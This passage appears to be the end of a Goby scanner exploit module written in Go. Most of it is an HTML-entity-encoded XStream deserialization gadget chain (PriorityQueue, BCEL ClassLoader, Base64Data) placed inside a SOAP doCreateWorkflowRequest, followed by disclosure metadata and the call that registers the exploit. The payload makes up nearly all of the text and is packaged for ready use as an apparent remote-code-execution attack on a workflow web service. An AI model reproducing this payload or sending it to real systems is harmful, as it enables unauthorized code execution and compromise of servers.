;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x73;&#x65;&#x74;&#x22;&#x3e;&#x3c;&#x2f;&#x63;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x75;&#x74;&#x65;&#x78;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x22;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x24;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x53;&#x65;&#x74;&#x22;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x22;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x2f;&#x2e;&#x2e;&#x22;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x73;&#x5f;&#x2d;&#x53;&#x79;&#x6e;&#x63;&#x68;&#x72;&#x6f;&#x6e;&#x69;&#x7a;&#x65;&#x64;&#x43;&#x6f;&#x6c;&#x6c;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;&#x73;&#x3e;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6e;&#x61;&#x74;&#x69;&#x76;&#x65;&#x4c;&#x69;&#x62;&#x72;&#x61;&#x72;&#x69;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x61;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x4c;&#x6f;&#x63;&#x6b;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x64;&#x65;&#x66;&#x61;&#x75;&#x6c;&#x74;&#x41;&#x73;&#x73;&#x65;&#x72;&#x74;&#x69;&#x6f;&#x6e;&#x53;&#x74;&#x61;&#x74;&#x75;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x6a;&#x61;&#x76;&#x61;&#x78;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x73;&#x75;&#x6e;&#x2e;&#x3c;&#x2f;&#x73;&#x74;&#x72;&#x69;&#x6e;&#x67;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x67;&#x6e;&#x6f;&#x72;&#x65;&#x64;&#x5f;&#x5f;&#x70;&#x61;&#x63;&#x6b;&#x61;&#x67;&#x65;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x6f;&#x72;&#x67;&#x2e;&#x61;&#x70;&#x61;&#x63;&#x68;&#x65;&#x2e;&#x62;&#x63;&#x65;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x53;&#x79;&#x6e;&#x74;&#x68;&#x65;&#x74;&#x69;&#x63;&#x52;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x61;&#x74;&#x68;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x2e;&#x3c;&#x2f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x5f;&#x5f;&#x70;&#x61;&#x74;&#x68;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x5f;&#x5f;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x64;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x65;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x72;&#x65;&#x70;&#x6f;&#x73;&#x69;&#x74;&#x6f;&#x72;&#x79;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x65;&#x66;&#x65;&#x72;&#x54;&#x6f;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x73;&#x75;&#x6e;&#x2e;&#x6d;&#x69;&#x73;&#x63;&#x2e;&#x4c;&#x61;&#x75;&#x6e;&#x63;&#x68;&#x65;&#x72;&#x24;&#x45;&#x78;&#x74;&#x43;&#x6c;&#x61;&#x73;&#x73;&#x4c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x27;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x70;&#x61;&#x72;&#x65;&#x6e;&#x74;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x70;&#x72;&#x6f;&#x63;&#x65;&#x73;&#x73;&#x6f;&#x72;&#x43;&#x4c;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x74;&#x65;&#x72;&#x61;&#x74;&#x6f;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x4b;&#x45;&#x59;&#x53;&#x3c;&#x2f;&#x74;&#x79;&#x70;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x69;&#x6e;&#x20;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x3d;&#x27;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x69;&#x6f;&#x2e;&#x42;&#x79;&#x74;&#x65;&#x41;&#x72;&#x72;&#x61;&#x79;&#x49;&#x6e;&#x70;&#x75;&#x74;&#x53;&#x74;&#x72;&#x65;&#x61;&#x6d;&#x27;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x62;&#x75;&#x66;&#x3e;&#x3c;&#x2f;&#x62;&#x75;&#x66;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x70;&#x6f;&#x73;&#x3e;&#x30;&#x3c;&#x2f;&#x70;&#x6f;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x30;&#x3c;&#x2f;&#x6d;&#x61;&#x72;&#x6b;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x30;&#x3c;&#x2f;&#x63;&#x6f;&#x75;&#x6e;&#x74;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x69;&#x73;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x66;&#x61;&#x6c;&#x73;&#x65;&#x3c;&#x2f;&#x63;&#x6f;&#x6e;&#x73;&#x75;&#x6d;&#x65;&#x64;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x53;&#x6f;&#x75;&#x72;&#x63;&#x65;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x74;&#x72;&#x61;&#x6e;&#x73;&#x66;&#x65;&#x72;&#x46;&#x6c;&#x61;&#x76;&#x6f;&#x72;&#x73;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x48;&#x61;&#x6e;&#x64;&#x6c;&#x65;&#x72;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x30;&#x3c;&#x2f;&#x64;&#x61;&#x74;&#x61;&#x4c;&#x65;&#x6e;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x3e;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x20;&#x72;&#x65;&#x66;&#x65;&#x72;&#x65;&#x6e;&#x63;&#x65;&#x3d;&#x27;&#x2e;&#x2e;&#x2f;&#x63;&#x6f;&#x6d;&#x2e;&#x73;&#x75;&#x6e;&#x2e;&#x78;&#x6d;&#x6c;&#x2e;&#x69;&#x6e;&#x74;&#x65;&#x72;&#x6e;&#x61;&#x6c;&#x2e;&#x62;&#x69;&#x6e;&#x64;&#x2e;&#x76;&#x32;&#x2e;&#x72;&#x75;&#x6e;&#x74;&#x69;&#x6d;&#x65;&#x2e;&#x75;&#x6e;&#x6d;&#x61;&#x72;&#x73;&#x68;&#x61;&#x6c;&#x6c;&#x65;&#x72;&#x2e;&#x42;&#x61;&#x73;&#x65;&#x36;&#x34;&#x44;&#x61;&#x74;&#x61;&#x27;&#x2f;&#x3e;&#x0a;&#x20;&#x20;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;&#x0a;&#x3c;&#x2f;&#x6a;&#x61;&#x76;&#x61;&#x2e;&#x75;&#x74;&#x69;&#x6c;&#x2e;&#x50;&#x72;&#x69;&#x6f;&#x72;&#x69;&#x74;&#x79;&#x51;&#x75;&#x65;&#x75;&#x65;&#x3e;</web:string>\n        <web:string>2</web:string>\n      </web:doCreateWorkflowRequest>\n   </soapenv:Body>\n</soapenv:Envelope>\n"
      },
      "SetVariable": [
        "output|lastbody"
      ]
    }
  ],
  "PostTime": "2021-05-21 22:24:07",
  "GobyVersion": "1.8.275",
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "CVEIDs": null,
  "CVSSScore": "0.0",
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  },
  "DisclosureDate": "2021-05-22"
}`

	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		nil,
		nil,
	))
}